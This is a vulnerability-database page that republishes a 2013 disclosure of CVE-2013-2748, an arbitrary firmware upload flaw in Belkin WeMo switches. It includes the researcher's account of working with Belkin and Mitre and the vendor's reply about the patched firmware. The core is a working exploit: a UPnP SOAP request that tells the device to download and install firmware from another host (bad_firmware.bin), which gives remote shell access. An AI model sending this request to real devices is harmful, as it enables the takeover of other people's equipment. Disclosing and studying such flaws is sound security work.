Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Belkin Wemo Arbitrary Firmware Upload

Related Vulnerabilities: CVE-2013-2748  
Publish Date: 07 Apr 2013
Author: Daniel Buentello
Source 
                							

                # Exploit Title: Belkin Wemo Arbitrary Firmware Vulnerability
# Date: 4/3/13
# Exploit Author: Daniel Buentello
# Vendor Homepage: http://www.belkin.com/us/wemo
# Version: Any version prior to WeMo_US_2.00.2176.PVT
# CVE : CVE-2013-2748
 
Hello
Im independently working with Mitre and Belkin on this matter so please
disregard my naiveness. Several months ago I discovered a vulnerablility on
the Belkin WeMo light switch would allow arbitrary firmware to uploaded
resulting in remote shell access.
Here is a youtube link to a PoC video I made:
https://www.youtube.com/watch?v=BcW2q0aHOFo
 
I was finally able to reach Belkin and worked with them on patching the
vulnerability. I recently heard back from them and here is the
correspondence:
 
Daniel,
The FW for WeMo Switch and Sensor with the security fixes for some of the
issues you notified us about have shipped. The updated FW version is
WeMo_US_2.00.2176.PVT and WeMo_WW_2.00.2176.PVT (worldwide version). I
didn't register for CVE's for the vulns you found, as the process wasn't
clear for companies outside tier 1 (Microsoft, Oracle, Apple, Adobe) type
companies. We are still working on a credit page for White Hat submissions
and it will probably be a few months out.
 
I reached out to Mitre and they assigned me a CVE and recommended I submit
my code here. Here is the code which would allow someone to upload their
own firmware:
 
 
POST /upnp/control/firmwareupdate1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"
Content-Length:
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent:
 
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <s:Body>
  <u:UpdateFirmware xmlns:u="urn:Belkin:service:firmwareupdate:1">
 
 <ReleaseDate>07Jan2013</ReleaseDate><NewFirmwareVersion>1</NewFirmwareVersion><URL>
http://10.0.1.99/bad_firmware.bin<http://10.0.1.99/WeMo_US_2.00.1821.PVT_SNS.bin.gpg%3C/URL%3E%3CSignature%3Ea053469a3efe2bd5e396104ac1ef5b0e%3C/Signature%3E>
  </u:UpdateFirmware>
 </s:Body>
</s:Envelope>
 
 
Mitre needs the vulnerability documented on an external site in order to
add the entry into the CVE database. If needed I can forward you the PGP
signed message from them. If you need anything else feel free to ask. I
have copies of all correspondence between Belkin., Mitre, and myself.

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started